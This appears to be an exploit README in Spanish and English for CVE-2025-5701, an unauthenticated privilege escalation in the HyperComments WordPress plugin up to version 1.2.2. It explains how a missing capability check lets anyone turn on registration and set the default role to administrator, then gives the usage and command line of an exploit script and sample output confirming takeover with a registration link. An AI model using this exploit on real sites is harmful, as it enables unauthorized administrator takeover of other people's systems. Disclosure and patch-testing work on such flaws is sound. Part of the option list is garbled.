
El complemento HyperComments de WordPress <= 1.2.2 es vulnerable a la escalada de privilegios.
Severidad: CRÍTICA (CVSS 9.8)
Plugin Afectado: HyperComments para WordPress
Versiones Afectadas: ≤ 1.2.2
El plugin HyperComments para WordPress es vulnerable a la modificación no autorizada de opciones de WordPress debido a una falta de verificación de capacidades en la función hc_request_handler. Esto permite a atacantes no autenticados actualizar opciones arbitrarias de WordPress, como:
users_can_register)default_role)Al encadenar estas acciones, un atacante puede habilitar el registro y asegurar que cualquier nuevo usuario reciba automáticamente el rol de Administrador.
CVSS v3.1: 9.8 CRITICAL
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit
By: Khaled Alenazi (Nxploited)
usage: CVE-2025-5701.py [-h] -u URL
CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g., http://target-site.com)
python3 CVE-2025-5701.py -u http://target-site.com
CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit
By: Khaled Alenazi (Nxploited)
[+] Target is vulnerable (version: 1.2.2) - proceeding with exploitation.
[+] Exploit endpoint is accessible.
[+] Server response: {"result":"success"}
[+] Registration is now enabled. New users will be assigned administrator role.
[+] Register here: http://target-site.com/wp-login.php?action=register
Exploit by: Khaled Alenazi (Nxploited)
Este script se proporciona únicamente con fines educativos. El acceso no autorizado a sistemas sin permiso es ilegal y poco ético. Utilícelo solo en entornos controlados o con autorización explícita.
Nxploited (Khaled_alenazi)